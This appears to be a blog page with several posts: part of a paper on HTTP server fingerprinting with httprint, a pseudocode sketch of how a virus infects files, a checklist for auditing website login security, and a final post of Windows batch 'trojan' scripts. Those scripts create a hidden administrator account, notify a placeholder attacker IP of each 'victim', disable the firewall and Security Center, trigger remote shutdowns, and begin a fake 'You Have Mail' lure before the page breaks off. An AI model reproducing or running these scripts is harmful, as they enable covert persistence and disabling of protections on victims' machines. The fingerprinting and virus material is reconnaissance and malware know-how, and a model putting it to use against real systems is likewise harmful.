The rest of the paper focusses on using statistical and fuzzy logic techniques in analysing the responses from the HTTP tests. The technique consists in perfomrming signature analysis with a set of stored signatures, and assigning a confidence rating to each candidate signature. The signatures with the highest confidence rating are then reported as potential matches for the unknown server being tested.

7.1 Assumptions
The fingerprinting engine operates with a known set of server signatures. It can therefore only identify HTTP servers that it knows about. If a server's signature is not present in the set of known signatures, the fingerprinting engine shall report the next closest server, in terms of server behaviour and characteristics.

While performing HTTP fingerprint tests, there shall be no HTTP proxy server present between the system running the fingerprinting engine and the target web server.

7.2 Terms and Definitions
Term Description
Signature Set S = {s1, s2, ..., sn}
n = number of web server signatures known to the fingerprinting engine.
si = ith signature in the signature set.
Reported Signature sR
The signature that is derived from running HTTP fingerprinting tests against an unknown web server.
Comparision function
and Weight wi = fw(sR, si)
wi = Weight when reported signature sR is compared against the ith signature in the signature set S.
fw(sa, sb) = Comparision function, which compares signature sa against sb, and returns a resultant weight.
Weight Vector W = {w1, w2, ..., wn}
Confidence Rating ci = fc(wi, W)
ci = likelihood that signature si, with weight wi is the best match amongst the entire signature set S, whose weight vector is represented by W.
fc(wa, W) = Fuzzy logic function to calculate the likelihood, in percentage terms, of wa being the best weight amongst the weight vector W.
Confidence Vector C = {c1, c2, ..., cn}
Max Confidence cmax
Maximum confidence rating amongst all the confidence ratings in the confidence vector C.
Best match Vector M = {smaxA, smaxB, ...}
smaxA, smaxB = signatures whose confidence ratings equal to cmax

7.3 Analysis Logic
The following piece of pseudo code outlines how the best match is chosen out of the signature set.

Load the signature set S = {s1, ..., sn}
Run the fingerprinting tests and obtain sR for the unknown web server.
for i = 1 .. n
wi = fw(sR, si)
next
for i = 1 .. n
ci = fc(wi, W)
next
cmax = max(C)
M = {}
for i = 1 .. n
if ci = cmax then
M = M U {si}
end if
next
print M
8. httprint - the advanced HTTP fingerprinting engine
The httprint [6] fingerprinting engine uses statistical analysis, combined with fuzzy logic techniques, to determine the type of HTTP server.

httprint can be used to both gather as well as analyse signatures generated from HTTP servers.

Although httprint is not open source, it is available at no cost for personal, educational and non-commercial use.

8.1 httprint signatures
HTTP signatures generated by httprint are hexadecimal encoded ASCII strings, as the ones shown below:

Microsoft-IIS/5.0CD2698FD6ED3C295E4B1653082C10D64050C5D2594DF1BD04276E4BB811C9DC50D7645B5811C9DC52A200B4C9D69031D6014C217811C9DC5811C9DC52655F350FCCC535BE2CE6923E2CE69232FCD861AE2CE69272576B769E2CE6926CD2698FD6ED3C295E2CE692009DB9B3E811C9DC5811C9DC56ED3C2956ED3C295E2CE69236ED3C2956ED3C295811C9DC5E2CE69276ED3C295Apache/2.0.x9E431BC86ED3C295811C9DC5811C9DC5050C5D32505FCFE84276E4BB811C9DC50D7645B5811C9DC5811C9DC5CD37187C11DDC7D7811C9DC5811C9DC58A91CF57FCCC535B6ED3C295FCCC535B811C9DC5E2CE6927050C5D336ED3C2959E431BC86ED3C295E2CE69262A200B4C6ED3C2956ED3C2956ED3C2956ED3C295E2CE6923E2CE69236ED3C295811C9DC5E2CE6927E2CE6923
httprint maintains a set of signatures in a text file [7], and uses these to analyse the results generated from an unknown server. It is easily possible to extend the signatures database, by simply cutting-and-pasting the signature output of httprint, when used against a known server whose fingerprint is not in the database. The next time httprint is run, the newly added signature will be used in the comparision.

8.2 httprint command line and GUI interfaces
httprint is available in both command-line and GUI versions, running on Windows, Linux, Mac OS X and FreeBSD for this release - v200.

httprint's command line options are as under:

# ./httprint httprint v0.200 (beta) - web server fingerprinting tool(c) 2003, net-square solutions pvt. ltd. - see readme.txthttp://net-square.com/httprint/
httprint@net-square.comUsage:httprint {-h | -i -s [... options]-h host can be either an IP address, a symbolic name, an IP range or a URL.-i file containing list of hosts as described above in text format.-x Nmap -oX option generated xml file as input file. Ports which can be considered as http ports are taken from the nmapportlist.txt file.-s file containing http fingerprint signatures.Options:-o Default output file is "httprintoutput.html". Use this option to override the output filename.-oc output in csv format-ox output in xml format-tp Ping timeout in milliseconds. Default is 1000 ms. Maximum 30000 ms.-t Connection/read timeout in milliseconds. Default is 10000 ms. Maximum 100000 ms.-r Number of retries. Default is 3. Maximum 30.-P0 Turn ping off.-? Displays this message.Examples:httprint -h www1.example.com -s signatures.txthttprint -h https://www2.example.com/ -s signatures.txthttprint -h http://www3.example.com:8080/ -s signatures.txthttprint -h 10.0.1.1-10.0.1.254 -s signatures.txt -o 10_0_1_x.htmlhttprint -x nmap.xml -s signatures.txt -oc report.csvhttprint -x nmap.xml -s signatures.txt -ox report.xmlhttprint -i input.txt -s signatures.txt -o output.html
The options are self-explanatory.

For the Win32 platform, httprint is also available in a GUI interface. The screenshot of the GUI version is shown below:

8.3 Running httprint
An example of the output generated by httprint is shown below:

# ./httprint -s signatures.txt -o apache1.html -h apache.example.comhttprint v0.200 (beta) - web server fingerprinting tool(c) 2003, net-square solutions pvt. ltd. - see readme.txthttp://net-square.com/httprint/
httprint@net-square.com--------------------------------------------------Finger Printing on http://apache.example.com:80/Derived Signature:Apache-AdvancedExtranetServer/2.0.44 (Mandrake Linux/11mdk) mod_perl/1.99_08 Perl/v5.8.0 mod_ssl/2.0.44 OpenSSL/0.9.7a PHP/4.3.19E431BC86ED3C295811C9DC5811C9DC5050C5D32505FCFE84276E4BB811C9DC50D7645B5811C9DC5811C9DC5811C9DC511DDC7D7811C9DC5811C9DC58A91CF57FCCC535B6ED3C295FCCC535B811C9DC56ED3C295050C5D336ED3C2959E431BC86ED3C295E2CE69262A200B4C6ED3C2956ED3C2956ED3C2956ED3C295E2CE6923E2CE69236ED3C295811C9DC56ED3C295E2CE6923Banner Reported: Apache-AdvancedExtranetServer/2.0.44 (Mandrake Linux/11mdk) mod_perl/1.99_08 Perl/v5.8.0 mod_ssl/2.0.44 OpenSSL/0.9.7a PHP/4.3.1Banner Deduced: Apache/2.0.xScores: Apache/2.0.x: 126 81.29Apache/1.3.[4-24]: 118 64.73Apache/1.3.27: 117 62.83Apache/1.3.26: 116 60.96Apache/1.2.6: 113 55.59Apache/1.3.[1-3]: 113 55.59Stronghold/4.0-Apache/1.3.x: 66 6.89Netscape-Enterprise/4.1: 59 4.07Com21 Cable Modem: 56 3.11Oracle Servlet Engine: 55 2.82Microsoft-IIS/5.0 ASP.NET: 55 2.82Microsoft-IIS/5.1: 55 2.82Microsoft-IIS/6.0: 55 2.82Lotus-Domino/6.x: 51 1.81Netscape-Enterprise/3.6 SP2: 50 1.60EMWHTTPD/1.0: 50 1.60dwhttpd (Sun Answerbook): 49 1.39Netscape-Enterprise/6.0: 49 1.39thttpd: 48 1.20Netscape-Enterprise/3.5.1G: 46 0.85Microsoft-IIS/4.0: 45 0.70Microsoft-IIS/5.0: 45 0.70Zeus/4.0: 26 0.53Zeus/4.1: 25 0.52Xerver_v3: 25 0.52CompaqHTTPServer-SSL/4.2: 23 0.50Orion/2.0x: 23 0.50AOLserver/3.4.2-3.5.1: 23 0.50Jana Server/1.45: 23 0.50Netscape-Enterprise/3.6: 20 0.45Microsoft-IIS/URLScan: 20 0.45NetWare-Enterprise-Web-Server/5.1: 20 0.45HP-ChaiServer/3.0: 32 0.43Oracle XML DB/Oracle9i: 17 0.38Hewlett Packard xjet: 16 0.35Domino-Go-Webserver/4.6.2.8: 35 0.30Linksys AP2: 14 0.29CompaqHTTPServer/1.0: 36 0.24Zeus/4_2: 36 0.24Netscape-Enterprise/3.5.1: 36 0.24Stronghold/2.4.2-Apache/1.3.x: 36 0.24TightVNC: 36 0.24SunONE WebServer 6.0: 12 0.23Netscape-Enterprise/4.1: 12 0.23Lotus-Domino/5.x: 11 0.20Cisco-HTTP: 11 0.20MiniServ/0.01 Webmin: 37 0.18fnord: 10 0.17WebLogic Server 8.1: 10 0.17RemotelyAnywhere: 10 0.17WebLogic Server 8.x: 10 0.173Com/v1.0: 10 0.17CompaqHTTPServer/4.2: 40 0.08Snap Appliances, Inc./3.x: 1 0.00Linksys Router: 0 0.00Linksys AP1: 0 0.00EHTTP/1.1: 0 0.00--------------------------------------------------Dumping results in html file..
In the above example, httprint first displays the signature it generates from the server "apache.example.com". It then proceeds to compare the signature with those stored in its database, and assigns weights and confidence ratings for every fingerprint. The signature with the highest confidence rating is chosen to be the best match. In this case, it is "Apache/2.0.x" server with a confidence rating of 81.29%. The next best matches are "Apache/1.3.[4-24]" with a confidence rating of 64.73% and "Apache/1.3.27" with a confidence rating of 62.63%.

8.4 The significance of confidence ratings
We may ask ourselves, why do we need confidence ratings? Picking the highest weight alone may seem to suffice in choosing the best match for the web server. The significance of confidence ratings can be best illustrated by an example. Let us assume that there are no signatures for any version of Apache present in the signature set. Therefore, if we run httprint against an Apache server, it will never be able to identify the Apache server. Instead, it will try and pick out the closest approximation to Apache, in terms of behaviour and characteristics, from the signature set.

Given below is the output of httprint running against "apache.example.org" (as shown in section 8.3), but this time, without any Apache signatures present in its signature set.

# ./httprint -s reduced_signatures.txt -o apache2.html -h apache.example.comhttprint v0.200 (beta) - web server fingerprinting tool(c) 2003, net-square solutions pvt. ltd. - see readme.txthttp://net-square.com/httprint/
httprint@net-square.com--------------------------------------------------Finger Printing on http://apache.example.com:80/Derived Signature:Apache-AdvancedExtranetServer/2.0.44 (Mandrake Linux/11mdk) mod_perl/1.99_08 Perl/v5.8.0 mod_ssl/2.0.44 OpenSSL/0.9.7a PHP/4.3.19E431BC86ED3C295811C9DC5811C9DC5050C5D32505FCFE84276E4BB811C9DC50D7645B5811C9DC5811C9DC5811C9DC511DDC7D7811C9DC5811C9DC58A91CF57FCCC535B6ED3C295FCCC535B811C9DC56ED3C295050C5D336ED3C2959E431BC86ED3C295E2CE69262A200B4C6ED3C2956ED3C2956ED3C2956ED3C295E2CE6923E2CE69236ED3C295811C9DC56ED3C295E2CE6923Banner Reported: Apache-AdvancedExtranetServer/2.0.44 (Mandrake Linux/11mdk) mod_perl/1.99_08 Perl/v5.8.0 mod_ssl/2.0.44 OpenSSL/0.9.7a PHP/4.3.1Banner Deduced: Netscape-Enterprise/4.1Scores: Netscape-Enterprise/4.1: 59 38.06Com21 Cable Modem: 56 30.85Microsoft-IIS/6.0: 55 28.65Microsoft-IIS/5.1: 55 28.65Microsoft-IIS/5.0 ASP.NET: 55 28.65Oracle Servlet Engine: 55 28.65Lotus-Domino/6.x: 51 20.82Netscape-Enterprise/3.6 SP2: 50 19.10EMWHTTPD/1.0: 50 19.10dwhttpd (Sun Answerbook): 49 17.46Netscape-Enterprise/6.0: 49 17.46thttpd: 48 15.91Netscape-Enterprise/3.5.1G: 46 13.06Microsoft-IIS/4.0: 45 11.76Microsoft-IIS/5.0: 45 11.76CompaqHTTPServer/4.2: 40 6.36MiniServ/0.01 Webmin: 37 3.94TightVNC: 36 3.25Netscape-Enterprise/3.5.1: 36 3.25Zeus/4_2: 36 3.25CompaqHTTPServer/1.0: 36 3.25Domino-Go-Webserver/4.6.2.8: 35 2.63Netscape-Enterprise/3.6: 20 1.34NetWare-Enterprise-Web-Server/5.1: 20 1.34Microsoft-IIS/URLScan: 20 1.34Oracle XML DB/Oracle9i: 17 1.29Hewlett Packard xjet: 16 1.23CompaqHTTPServer-SSL/4.2: 23 1.19AOLserver/3.4.2-3.5.1: 23 1.19Jana Server/1.45: 23 1.19Orion/2.0x: 23 1.19Linksys AP2: 14 1.09HP-ChaiServer/3.0: 32 1.07Xerver_v3: 25 0.95Zeus/4.1: 25 0.95SunONE WebServer 6.0: 12 0.90Netscape-Enterprise/4.1: 12 0.90Cisco-HTTP: 11 0.80Lotus-Domino/5.x: 11 0.80Zeus/4.0: 26 0.783Com/v1.0: 10 0.70fnord: 10 0.70RemotelyAnywhere: 10 0.70WebLogic Server 8.x: 10 0.70WebLogic Server 8.1: 10 0.70Snap Appliances, Inc./3.x: 1 0.01Linksys Router: 0 0.00Linksys AP1: 0 0.00EHTTP/1.1: 0 0.00--------------------------------------------------Dumping results in html file..
In this example, we notice that httprint has reported the best match to be "Netscape-Enterprise/4.1". However, if we look at the confidence ratings for each signature, we notice that "Netscape-Enterprise/4.1" has a confidence rating of only 38.06%. The other close candidates are "Com21 Cable Modem" with a confidence rating of 30.85% and "Microsoft-IIS/6.0" with a confidence rating of 28.65%. Compare this with the confidence ratings generated when the Apache signatures were present in httprint's signature set in section 8.3. These seem to indicate a much better level of confidence in the best match. Also, the top three matches all belong to the Apache group of servers, which, again goes to re-assure us of httprint's inference.

Looking at this, we can infer that httprint has not been effective in picking the best choice out of what it knows from its signature set, and hence, the signature set needs to be updated.

Another tool, HMAP [8], uses a similar approach in sending HTTP tests but it does not perform fuzzy fingerprint comparisions and confidence ratings calculations.

8.5 httprint Reports
httprint, by default, generates reports in HTML format, along with some verbose output results embedded as HTML comments, which may be useful for further analysis. A sample report is shown below:

With version 200, httprint can also generate reports in CSV and XML formats (available with the enterprise version only).

8.6 Customising httprint
httprint uses ASCII text files for storing server signatures. It is possible to extend httprint's set of signatures, for covering a wider variety of web servers, by simply running httprint against the unknown server, and then including the generated signature in the signatures file. For reporting, it is also possible to associate GIF files having server icons with each signature, which will be then used when generating the HTML report.

9. Trying to defeat HTTP Fingerprinting
The technique of system fingerprinting is not yet as foolproof as human fingerprinting. It is possible to disguise and customize HTTP servers quite sufficiently to ensure that they give unexpected results for all HTTP tests.

The following is a list of some of the techniques that can be used to attempt to defeat HTTP fingerprinting:

Changing the HTTP server banner string
Stripping or re-arranging the HTTP headers
Customising HTTP error codes such as 404 or 500
Using an HTTP server plug-in
Out of the above techniques, the first three techniques are quite obvious. The last one, using a plug-in, is discussed a little more in detail.

One such product on the market is ServerMask [4], which is a plug-in to Microsoft IIS servers. ServerMask not only obfuscates the server banner string, but also re-arranges the HTTP response header field order, to mimic servers like Apache, obscures internal server generated cookies, and even has the ability to pose as a random HTTP server for every HTTP request.

However, ServerMask can yet be defeated by fingerprinting engines like httprint, which use fuzzy logic analysis on the test results, as shown in the example below:

# ./httprint -s signatures.txt -o unknown.html -h unknown.example.comhttprint v0.200 (beta) - web server fingerprinting tool(c) 2003, net-square solutions pvt. ltd. - see readme.txthttp://net-square.com/httprint/
httprint@net-square.com--------------------------------------------------Finger Printing on http://unknown.example.com:80/Derived Signature:Yes we are using ServerMaskFACD41D36ED3C295811C9DC5811C9DC5811C9DC5505FCFE84276E4BB811C9DC50D7645B5811C9DC5811C9DC59D69031D6014C217811C9DC5811C9DC580FF2CD2FCCC535BE2CE6923FCCC535B811C9DC5E2CE69272576B769E2CE6926811C9DC5811C9DC5FCCC535B811C9DC56ED3C2956ED3C2956ED3C2956ED3C2956ED3C2956ED3C2956ED3C295811C9DC568D17AAD68D17AADBanner Reported: Yes we are using ServerMaskBanner Deduced: Microsoft-IIS/5.1, Microsoft-IIS/5.0, Microsoft-IIS/4.0Scores:Microsoft-IIS/5.1: 83 53.55Microsoft-IIS/5.0 ASP.NET: 83 53.55Microsoft-IIS/4.0: 83 53.55Microsoft-IIS/5.0: 73 33.22Apache/1.3.27: 69 26.74Apache/1.3.[1-3]: 68 25.26Apache/1.3.[4-24]: 68 25.26Apache/1.2.6: 68 25.26Apache/1.3.26: 68 25.26Com21 Cable Modem: 66 22.46Netscape-Enterprise/4.1: 63 18.63Apache/2.0.x: 60 15.23EMWHTTPD/1.0: 59 14.19dwhttpd (Sun Answerbook): 56 11.34SMC Wireless Router 7004VWBR: 56 11.34Agranat-EmWeb: 52 8.11Microsoft-IIS/URLScan: 50 6.73Oracle Servlet Engine: 48 5.49Microsoft-IIS/6.0: 48 5.49Netscape-Enterprise/3.6 SP2: 47 4.92AOLserver/3.5.6: 46 4.39TightVNC: 46 4.39MiniServ/0.01 Webmin: 41 2.19Netscape-Enterprise/3.5.1: 41 2.19Microsoft-IIS/5.0 Virtual Host: 22 0.78Orion/2.0x: 21 0.78AOLserver/3.4.2-3.5.1: 21 0.78Xerver_v3: 23 0.78Zeus/4_2: 23 0.78Domino-Go-Webserver/4.6.2.8: 24 0.76Jana Server/1.45: 24 0.76Zope/2.6.0 ZServer/1.1b1: 18 0.72Hewlett Packard xjet: 25 0.72thttpd: 36 0.69fnord: 17 0.69Zeus/4.1: 16 0.65HP-ChaiServer/3.0: 27 0.62Linksys AP2: 15 0.61Cisco-HTTP: 15 0.61Zeus/4.0: 15 0.61Lotus-Domino/6.x: 28 0.55Stronghold/2.4.2-Apache/1.3.x: 28 0.55Oracle XML DB/Oracle9i: 13 0.51WebLogic Server 8.1: 11 0.40Netscape-Enterprise/3.6: 11 0.40WebLogic Server 8.x: 11 0.40Microsoft ISA Server: 11 0.40NetWare-Enterprise-Web-Server/5.1: 11 0.40CompaqHTTPServer/4.2: 30 0.35Stronghold/4.0-Apache/1.3.x: 30 0.35CompaqHTTPServer-SSL/4.2: 10 0.353Com/v1.0: 10 0.35RemotelyAnywhere: 10 0.35Linksys Print Server: 10 0.35CompaqHTTPServer/1.0: 31 0.23Netscape-Enterprise/3.5.1G: 31 0.23Netscape-Enterprise/6.0: 33 0.08Snap Appliances, Inc./3.x: 4 0.07Lotus-Domino/5.x: 2 0.02Netscape-Enterprise/4.1: 2 0.02SunONE WebServer 6.0: 2 0.02EHTTP/1.1: 1 0.00Linksys Router: 0 0.00Linksys AP1: 0 0.00ServletExec: 0 0.00--------------------------------------------------Dumping results in html file..
Here, even though the server's responses were obfuscated by ServerMask, httprint still accurately identifies it as a Microsoft-IIS/5.x or 4.0 web server.

Given below is an example of five servers using a combination of the techniques discussed above, to disguise their HTTP server behaviour. httprint succeeds in identifying the correct web server platform.

A detailed analysis and validation of the above report can be found here

10. Conclusion
This paper was meant to serve as an introduction to HTTP fingerprinting, and has provided an overview of some of the techniques used. HTTP fingerprinting can be also extended to various other areas of research, such as fingerprinting applications running on HTTP, embedded devices that run an HTTP interface, etc.

11. References
[1] nmap OS fingerprinting http://www.insecure.org/nmap/nmap-fingerprinting-article.html
[2] Section 6.2 of RFC 2616 http://www.ietf.org/rfc/rfc2616.txt
[3] Netcat for Unix http://www.atstake.com/research/tools/network_utilities/nc110.tgz,
Netcat for Windows http://www.atstake.com/research/tools/network_utilities/nc11nt.zip
[4] ServerMask http://www.port80software.com/products/servermask/
[5] HTTP/1.1 RFC 2616 http://www.ietf.org/rfc/rfc2616.txt
[6] httprint from Net-Square http://net-square.com/httprint/
[7] httprint signatures http://net-square.com/httprint/signatures.txt
[8] HMAP web server fingerprinter http://wwwcsif.cs.ucdavis.edu/~leed/hmap/

revised 30/11/03 - saumil

Structure of Viruses

2008-01-23T22:22:00.000-08:00

Structure of Viruses

Here is a simple structure of a virus. In the infected binary, at a known byte location in the file, a virus inserts a signature byte used to determine if a potential carrier program has been previously infected.

V() { infectExecutable(); if (triggered()) { doDamage(); } jump to main of infected program; }void infectExecutable() { file = chose an uninfected executable file; prepend V to file; }void doDamage() { ... }int triggered() { return (some test? 1 : 0); }
The above virus makes the infected file longer than it was, making it easy to spot. There are many techniques to leave the file length

Auditing Web Site Authentication

2008-01-23T22:21:00.000-08:00

Auditing Web Site Authentication

--------------------------------------------------------------------------------

Consider this scenario: you build a Web site that requires some kind of user log-in. You allow users to create usernames and passwords and require a valid username and password to get in to your site. But is your Web site authentication scheme secure? Every time I register at a site, I marvel at the consistently laughable - sometimes pathetic - security among even the world's largest Web sites. As the Web becomes more a part of our personal lives, the threat of fraud and identity theft grows accordingly.

Inadequate user security is a problem that Web developers must address. Perhaps it is lack of standards. Perhaps it is a lack of auditing. This article addresses both of those issues by establishing a standard audit procedure by which to measure your own security. Test this list of questions against your own Web site's authentication scheme and see how it stands.

Usernames and Passwords

Does the system require both a username and password?

This one should be a no-brainer, but occasionally I run across a site that requires a password but no username. The problem with this arises if the user tries to set a password that another user has already used. You will have to notify the person that password is already taken and then they will know someone else's password, which, given that usernames aren't being used, may give him ready access to the system.

Does the system allow for, encourage, or enforce strong passwords?

If your security system depends on passwords, then you can only have strong security if you have strong passwords. Therefore, enforce minimum password lengths and do not allow passwords that closely match the username. Using numbers and punctuation characters will make a password stronger, but you can also encourage longer passwords, which are just as effective (see Ten Windows Password Myths). You can also make passwords stronger by allowing spaces and encouraging users to choose pass phrases. Furthermore, allow users to use any keyboard character in a password; don't limit them to characters and numbers. Also, set liberal limits on maximum password length: 128 characters or more.

AOL's ScreenName - which includes AIM, Netscape Network and Compuserve - allows passwords as short as three characters but will allow a maximum length of 16 characters, which is far too liberal on the minimum length and too restrictive on the maximum length.

Does the system allow for password aging and enforce a password history?

Hotmail was born July 4th, 1996 - nearly seven years ago. That's almost 2,500 days at the time of this writing. Now ask yourself, how many of those millions of early Hotmail users do you think still use the same password they set nearly seven years ago? If you do not want to enforce password aging on your Web site, you should at least occasionally remind people how old their password is.

Password histories prevent users from changing their expired passwords, then changing them back again. You do this by saving the last few passwords a user uses. Of course, users can circumvent this by changing their password a few times, filling up the password history, and then setting it back to the original. You can counter this by either having unlimited password history entries or enforcing minimum time periods before users can change their passwords again.

Does the system use easily-guessable or default usernames and passwords?

You should avoid using common, easily guessable, or sequential usernames. Avoiding these will help limit exposure to attacks against specific accounts. You should never assign default or easily guessed passwords to any account; instead, ask users to select their own passwords.

Is it possible to harvest usernames from the application?

Some applications allow the guessing, or harvesting or usernames from your application. If an attacker is able to collect a list of usernames, he can launch a brute-force attack looking for weak passwords. Revealing usernames can also lead to other problems. For example, the forums at groups.msn.com show the user's name with each post. Of course, you would want to know each user's name, but consider that having a user's name means you also have their e-mail address and Instant Messenger name. A spammer could easily spider the site and gather millions of account names.

Do error messages provide too much information about usernames or passwords?

Once I was logging into an online banking site, but mistyped my password. I got an error message stating that my password didn't match. It also told me that passwords are four characters long, can only be upper case letters or numbers, but cannot start with a number. While that information may be useful, it also lets a hacker know the limits of the password key space. Another Web site issued a notice that my password was made up of the last four digits of my Social Security number, which is hardly private information. Make sure your error messages do not reveal too much information about the nature of a password.

Does the module detect and prevent brute-force guessing of usernames or passwords?

To prevent intruders from launching brute-force password guessing attacks, take measures to detect and prevent these attacks. To reduce exposure to brute-force attacks, lockout accounts with high numbers of failed logins and be aware of total failed logins across the system.

Does the source code contain any hard-coded username or password checks?

If it does, remove them.

Does the system make use of obscurity to authenticate users?

I once saw a system at an e-commerce Web site that allowed users to access private files only if they knew the long, obscure URL of the files. This is similar to hiding a key under a doormat: you are safe only if people don't know you hide the key under the doormat.

Can users change their username?

Occasionally, users may need to change their username for one reason or another without creating an entirely new account. Some systems, however, do not allow this because the username is the primary key in the database. eBay allows users to change their username so they won't lose the hard-earned feedback on their account. On the other hand, you must carefully consider the effects of allowing users to do this. A user may want to change their username to avoid a bad reputation, and you certainly do not want to facilitate that.

Do you require e-mail addresses for usernames?

Microsoft's Passport requires that you set your username to a valid e-mail address. Usernames that are e-mail addresses may allow spammers to harvest e-mail addresses and make it difficult to change a username. It also forces users to change their username each time they change their e-mail address. You should allow users to use e-mail addresses for their account names, but do not force them to do so.

Do users automatically receive online accounts even though they will not use them?

Many banks automatically provide online account access for all their account holders, even if those account holders don't need to access their accounts online. Maybe these customers don't have Internet access, don't want to bother with learning how to use it, or don't trust their bank's security. Providing access that is not used can be dangerous because it results in unattended online accounts and many users who are not even aware that they have even have online accounts.

Password Management

Can users easily change their own passwords?

If you don't make it easy for users to change their passwords, they are less likely to do so. Changing passwords should be an obvious and convenient feature of any authentication system. One thing you can do for users when their password gets old is to put a small reminder at the top of the page, including a link to change their password.

Are users required to re-authenticate before and after changing a password?

When you allow users to change their passwords, have three fields: the old password, the new password, and verification of the new password. This prevents intruders from changing passwords on hijacked accounts. Say, for example, that someone logs in to a Web site, and then leaves the site to browse to other sites. Suppose then that they leave their desk with the browser window open. Someone else may be able to browse back to the site, change the user's password, and then have full control of the account. There are also situations where stealing a cookie or other authentication token allows someone else to hijack a user's account. If you always prompt for old passwords before setting new passwords, you will reduce these types of attacks because the attacker must know the user's actual password.

After users set a password, you should expire any session tokens and require them to log in again. Recently a friend received an e-mail stating that there was a problem with his eBay account. The e-mail had a link to log in to eBay to fix the problem. He clicked on the link, entered his username and password, but immediately realized that he might have been tricked into logging in to a fake site. Without delay, he changed his password, but then saw bogus auctions appearing on his account. Next, he found that his contact e-mail address had been changed. eBay's fraud detection kicked in and suspended his account, canceling over 250 active auctions. Even though he quickly changed his password, it was too late; a hacker had already logged in and had full access. In fact, the intruder was able to do anything he wanted until he closed the browser window or logged out. By forcing a logout after changing a password, you can terminate any active sessions.

Finally, when changing a user's password, always e-mail them a confirmation that the password has been changed, and perhaps include the IP address that initiated the change.

Does the system allow for password retrieval?

As an alternative for allowing users to retrieve passwords, you should instead have them reset their passwords. Allowing users to retrieve passwords means that passwords are retrievable; they are stored in a database table in either plain text or using reversible encryption.

Consider this example: a hacker breaks into someone's computer and has full access to the victim's PC. The hacker sees that the user has an online banking account. So he logs in to the banking site, clicks on the "Forgot My Password" link and waits for an e-mail. As soon as the mail containing the password comes in, he deletes the mail and logs in to the site. The user never knows that the password was compromised.

The best way to deal with lost passwords is to reset the password and e-mail the user a secure link back to your Web site. In the e-mail you should clearly state that a password reset was initiated and from which IP address it was initiated. Once they click on the link and have connected back to your Web site, they can select a new password for their account.

Does the system require some form of verification before resetting a password?

Another way to prevent the above scenario is to always prompt for some kind of personal information before sending an e-mail for a password reset or information request. You cannot assume that a user is the only person who will see the e-mail.

Does the system send sensitive information via e-mail?

Another issue with retrieving passwords is how you deliver the password back to the user. For example, when I looked at E*Trade's password retrieval scheme, I was at first quite impressed. You cannot retrieve a password, you can only reset it. The password retrieval page is SSL encrypted, so others cannot sniff the network and see your information. You even have to provide some personal information to initiate a password reset. The flaw with the system is that once you reset the password, it sends you a plain text e-mail with a new, temporary password. E-mail is not secure and is plainly visible on the wire between the user and the Web site.

AOL's ScreenName allows password retrieval without any personal authentication: all you need is a screen name to e-mail a user's password. If you are able to sniff a network, all you have to do is go to the password reminder page, enter the screen name, and then see what password is sent to the user.

Another common practice is to send users a confirmation e-mail containing their username and password, along with the recommendation to save that e-mail for future reference. Not only does this put the passwords at risk by sending them plain text over the wire, but it also encourages users to save these e-mails in their mail client.

Does the system assign temporary passwords?

If your system assigns temporary passwords, you should require either a password change after the first log-in or limit how long users can use temporary passwords. Several years ago, I subscribed to an online book service but later forgot my password. I submitted the password change request but I was required to answer a secret question, which I had not set up. I ended up sending an e-mail to the customer service department. A customer service representative promptly sent me a temporary password. In her e-mail she told me to change the password after logging in, because she gives everyone the same temporary password when she resets passwords. As soon as I logged in, I went to change my password, but couldn't figure out how to do it. Eventually I did change it, but I would guess that many others would quickly give up and just keep the temporary password. This can be avoided by doing two things: don't let customer service reps set passwords and limit the use of temporary passwords.

Does the system use password reminders?

Although they seem useful, password reminders or secret questions can actually weaken a system's security. For instance, when I signed up for an online air miles account with one major airline, it required that I provide a password of at least eight characters, a great practice that would allow a minimum of 218,340,105,584,896 possible passwords. However, it then asked me for a secret question, and gave me two fixed choices: my mother's maiden name or a pet's name.

The interesting thing about this is that there are only about 25,000 common surnames in the United States, which is roughly the number of permutations and combinations afforded by a three-character password. But if a hacker doesn't have time or a script to enter 25,000 names, there is a one in ten chance that someone in the U.S. will have one of the following names: Smith, Johnson, Williams, Jones, Brown, Davis, Miller, Wilson, Moore, Taylor, Anderson, Thomas, Jackson, White, Harris, Martin, Thompson, Garcia, Martinez, Robinson, Clark, Rodriguez, Lewis, Lee, Walker, Hall, Allen, or Young.

The top twenty pet names, according to a dog tag manufacturer, are: Max, Buddy, Molly, Bailey, Maggie, Lucy, Jake, Rocky, Sadie, Lucky, Daisy, Jack, Sam, Shadow, Bear, Buster, Lady, Ginger, Abby, and Toby.

If you do provide fixed secret questions, you should provide at least twenty, but preferably more questions from which to choose. Another option is to let the user select the secret question and provide an answer. While this provides many more options than a fixed set of questions, not all users will use them responsibly. Here are some examples of secret questions I have seen:

What is my name?
What's my e-mail address?
What is my password? (if you knew that, you wouldn't need the secret question would you?)
Another option that I sometimes see is just a simple password hint. This is the absolute worst thing you could do, as users often enter their actual password as the hint. If you really must do something like this, then make sure that the hint does not contain the user's actual password.

Secret questions can be useful but it is important that they not be the equivalent of a password. A secret question should be used to validate users so that you can reset their password, but should not be used to log in to the account.

Conclusion

This concludes the first part of this two-part article discussing some questions to audit the security of Web site authentication. This installment has focused on issues surrounding usernames and passwords. The second part of this article will explore issues surrounding user privacy, session authentication, user security, and cookies.

All trojans,virus programmes

2008-01-23T22:11:00.000-08:00

@ECHO OFF
net user Admin /add

net localgroup Administrators /add "Admin"

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "Admin" /t REG_DWORD /d 00000000 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Messenger" /v Start /t REG_DWORD /d 00000002 /f

net start Messenger

net send YourIPHere First victim online!

exit

You already know the 2 first commands, but the third is new. It hides the Admin user so you can't see it at startup. The fourth command starts the messenger service every time you logon.
The fifth starts the service messenger right now, and the last one have been explained.

Have Fun..
#####################################################################################
after you have connected try this little code

@echo off
net user name of account * you password twice eg abc abc * must be there.
net stop â€œSecurity Centerâ€
net stop SharedAccess
netsh firewall set opmode mode=disable
mkdir c:\haxed
start shutdown.exe -m \\name of there pc -s -t 100 -c "Windows Is Shuting Down dont worry it should stop it self if not type shutdown -a in run"
pause
start shutdown.exe -m \\there pc name -a
exit
#####################################################################################
heres a cool little batch filee a knocked up the other day just save as watever.bat o and read the passwords

@echo off
attrib +h +r s The address of your file you want to make hidden add a pluss infrond of the letters to make it hidden/read only/system
color fc
cls
echo.
echo.
echo You Have Mail
echo.
echo Press Enter To Open.
pause
cls
echo.
echo.
echo Incoming Message.
ping localhost -n 1 > nul
cls
echo.
echo.
echo Incoming Message..
ping localhost -n 1 >nul
cls
echo.
echo.
echo Incoming Message...
ping local host -n 1 >nul
cls
